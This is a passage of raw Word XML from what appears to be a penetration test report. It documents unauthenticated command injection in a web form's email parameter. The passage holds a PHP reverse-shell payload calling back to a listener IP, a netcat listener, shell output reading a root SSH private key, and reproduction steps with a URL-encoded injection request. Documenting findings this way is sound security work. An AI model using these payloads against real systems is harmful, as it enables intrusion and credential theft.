              <w:t>Host: 10.10.0.66</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03F2A9EC" w14:textId="77777777" w:rsidR="00DA7649" w:rsidRPr="0055639E" w:rsidRDefault="00DA7649" w:rsidP="00DA7649">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F6D7491" w14:textId="77777777" w:rsidR="00DA7649" w:rsidRPr="0055639E" w:rsidRDefault="00DA7649" w:rsidP="00DA7649">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cookie: authenticated=0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54C42842" w14:textId="751D8A22" w:rsidR="00DA7649" w:rsidRDefault="00DA7649" w:rsidP="00DA7649">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Connection: close</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11760C7E" w14:textId="77777777" w:rsidR="00AC67FD" w:rsidRDefault="00AC67FD" w:rsidP="00AC67FD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA7649">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B5967A" w14:textId="18537EDE" w:rsidR="00F66181" w:rsidRPr="00F66181" w:rsidRDefault="00F66181" w:rsidP="00AC67FD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F66181" w14:paraId="5D4DAE09" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="18DFD07B" w14:textId="3936E52B" w:rsidR="00F66181" w:rsidRDefault="00AC67FD" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -r '$sock=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>fsockopen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("10.10.0.10",31337);`/bin/bash &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3`;'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D274A07" w14:textId="6AD31040" w:rsidR="00F66181" w:rsidRDefault="00AC67FD" w:rsidP="00AC67FD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PHP Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EAA83D" w14:textId="405547A9" w:rsidR="00AC67FD" w:rsidRPr="00F66181" w:rsidRDefault="00AC67FD" w:rsidP="00AC67FD">
      <w:r>
        <w:t xml:space="preserve">After the assessment team sent the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payloaded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> request to the web server, their listener caught a connection back from </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC67FD">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>10.10.0.66</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. With the </w:t>
      </w:r>
      <w:r w:rsidRPr="004956AA">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> user access, the team was able to access sensitive information on the server and run additional commands. The below figure shows the listener catching the shell and the assessment team validating their access.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC67FD" w14:paraId="0E161873" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="507793C4" w14:textId="7732C91D" w:rsidR="00AC67FD" w:rsidRPr="0055639E" w:rsidRDefault="00AC67FD" w:rsidP="00AC67FD">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nlvp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 31337</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="166C9D7F" w14:textId="77777777" w:rsidR="00AC67FD" w:rsidRPr="0055639E" w:rsidRDefault="00AC67FD" w:rsidP="00AC67FD">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>listening on [any] 31337 ...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FE2DC10" w14:textId="77777777" w:rsidR="00AC67FD" w:rsidRPr="0055639E" w:rsidRDefault="00AC67FD" w:rsidP="004956AA">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>connect to [10.10.0.10] from (UNKNOWN) [10.10.0.66] 56152</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D21443B" w14:textId="77777777" w:rsidR="00AC67FD" w:rsidRPr="0055639E" w:rsidRDefault="00AC67FD" w:rsidP="004956AA">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="20434CEC" w14:textId="77777777" w:rsidR="00AC67FD" w:rsidRPr="0055639E" w:rsidRDefault="00AC67FD" w:rsidP="004956AA">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>www-data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74BBC976" w14:textId="77777777" w:rsidR="00AC67FD" w:rsidRPr="0055639E" w:rsidRDefault="00AC67FD" w:rsidP="004956AA">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1B826725" w14:textId="40C0996E" w:rsidR="00AC67FD" w:rsidRPr="0055639E" w:rsidRDefault="00AC67FD" w:rsidP="004956AA">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/var/www/html</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5914D77D" w14:textId="77777777" w:rsidR="004956AA" w:rsidRPr="0055639E" w:rsidRDefault="004956AA" w:rsidP="004956AA">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A18BF85" w14:textId="77777777" w:rsidR="004956AA" w:rsidRPr="0055639E" w:rsidRDefault="004956AA" w:rsidP="004956AA">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cat /.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>root.backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/.ssh/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>id_rsa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="527832A6" w14:textId="77777777" w:rsidR="004956AA" w:rsidRPr="0055639E" w:rsidRDefault="004956AA" w:rsidP="004956AA">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-----BEGIN RSA PRIVATE KEY-----</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B87F3B8" w14:textId="0B1928CD" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="004956AA" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MIIEpQIBAAK</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>[REDACTED]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2044E51C" w14:textId="6D8B13EA" w:rsidR="004956AA" w:rsidRPr="004956AA" w:rsidRDefault="004956AA" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="210A0190" w14:textId="246B4429" w:rsidR="00AC67FD" w:rsidRPr="007B579A" w:rsidRDefault="007B579A" w:rsidP="007B579A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>www-data User Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A23A306" w14:textId="77777777" w:rsidR="0055639E" w:rsidRDefault="0055639E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E5C56B" w14:textId="4C3DDD14" w:rsidR="00F66181" w:rsidRPr="003C17E2" w:rsidRDefault="00AC67FD" w:rsidP="003C17E2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>This exploit can be performed by a</w:t>
      </w:r>
      <w:r w:rsidR="004956AA">
        <w:t xml:space="preserve"> remote</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attacker without authentication to the web application</w:t>
      </w:r>
      <w:r w:rsidR="00C566FB">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="004956AA">
        <w:t xml:space="preserve"> allowing them to easily gain a shell in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004956AA" w:rsidRPr="004956AA">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>www_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004956AA" w:rsidRPr="004956AA">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004956AA">
        <w:t xml:space="preserve">user context. Because the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004956AA" w:rsidRPr="004956AA">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>www_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004956AA">
        <w:t xml:space="preserve"> user has access to the SSH Private Keys in the </w:t>
      </w:r>
      <w:r w:rsidR="004956AA" w:rsidRPr="004956AA">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004956AA" w:rsidRPr="004956AA">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>root.backup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004956AA" w:rsidRPr="004956AA">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/.ssh/</w:t>
      </w:r>
      <w:r w:rsidR="004956AA">
        <w:t xml:space="preserve"> directory, an attacker who exploited this vulnerability would be able quickly gain root access </w:t>
      </w:r>
      <w:r w:rsidR="00C566FB">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="004956AA">
        <w:t xml:space="preserve"> the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4528193E" w14:textId="2E5D39AA" w:rsidR="007B579A" w:rsidRDefault="007B579A" w:rsidP="00646037">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DCE774" w14:textId="5803AE12" w:rsidR="007B579A" w:rsidRDefault="007B579A" w:rsidP="007B579A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Write a command that will connect back to a listening machine.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Ex: </w:t>
      </w:r>
      <w:r w:rsidR="005D3AC9">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> -r '$sock=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>fsockopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>("$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ListeningMachineIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>PortNumber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>);`/bin/bash &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3`;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C81C355" w14:textId="62C7C1E7" w:rsidR="007B579A" w:rsidRPr="005D3AC9" w:rsidRDefault="005D3AC9" w:rsidP="007B579A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Escape the shell command by appending special characters on each side of the command.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Ex:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">' &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> -r '$sock=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>fsockopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>("$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ListeningMachineIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>",$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>PortNumber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>);`/bin/bash &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3`;'</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>;)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075537AF" w14:textId="1029892E" w:rsidR="005D3AC9" w:rsidRDefault="005D3AC9" w:rsidP="007B579A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>URL Encode the payload and append to a request URL parameter value.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Ex:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>GET /?name=test&amp;email=test</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>'%20%26%20php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.0.10%22%2C31337%29%3B%60%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%60%3B%27%3b%29%23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD519B2" w14:textId="12C1520A" w:rsidR="005D3AC9" w:rsidRDefault="005D3AC9" w:rsidP="007B579A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Start a listener on your machine.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Ex:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>nlvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
